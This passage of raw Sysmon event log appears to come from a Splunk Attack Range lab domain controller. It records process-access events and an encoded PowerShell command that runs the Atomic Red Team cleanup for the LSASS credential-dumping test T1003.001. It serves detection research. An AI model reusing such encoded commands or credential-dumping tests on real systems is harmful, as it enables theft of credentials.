30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\f0ead6fa30602f351c05c321f84071ac\Microsoft.PowerShell.Commands.Utility.ni.dll+66c0|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\f0ead6fa30602f351c05c321f84071ac\Microsoft.PowerShell.Commands.Utility.ni.dll+66c0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f2835e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f04137(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f03e08(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+319b546d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ec499e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f22e6d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f06363(wow64) 154100x80000000000000006036Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.160{D28789B6-7CE2-5FA1-4801-000000008801}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\qivzjcw2\qivzjcw2.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CE0-5FA1-AF9E-0B0000000000}0xb9eaf0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{D28789B6-7CE1-5FA1-4001-000000008801}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbABlAGEAbgB1AHAA 11241100x80000000000000006035Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7CE1-5FA1-4001-000000008801}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\qivzjcw2\qivzjcw2.cmdline2020-11-03 15:53:06.148 11241100x80000000000000006034Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:53:06.148{D28789B6-7CE1-5FA1-4001-000000008801}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\qivzjcw2\qivzjcw2.dll2020-11-03 15:53:06.148 10341000x80000000000000006033Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE2-5FA1-4701-000000008801}2584C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006032Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006031Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006030Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006029Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006028Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006027Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006026Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006025Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006024Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006023Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CE2-5FA1-4701-000000008801}2584C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006022Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.148{D28789B6-7CDA-5FA1-0E01-000000008801}15924444C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CE2-5FA1-4701-000000008801}2584C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006021Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.150{D28789B6-7CE2-5FA1-4701-000000008801}2584C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006020Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.038{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE2-5FA1-4601-000000008801}2472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006019Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.038{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006018Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.038{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006017Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.038{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006016Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.038{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006015Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.038{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006014Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.038{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006013Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:06.038{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006012Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 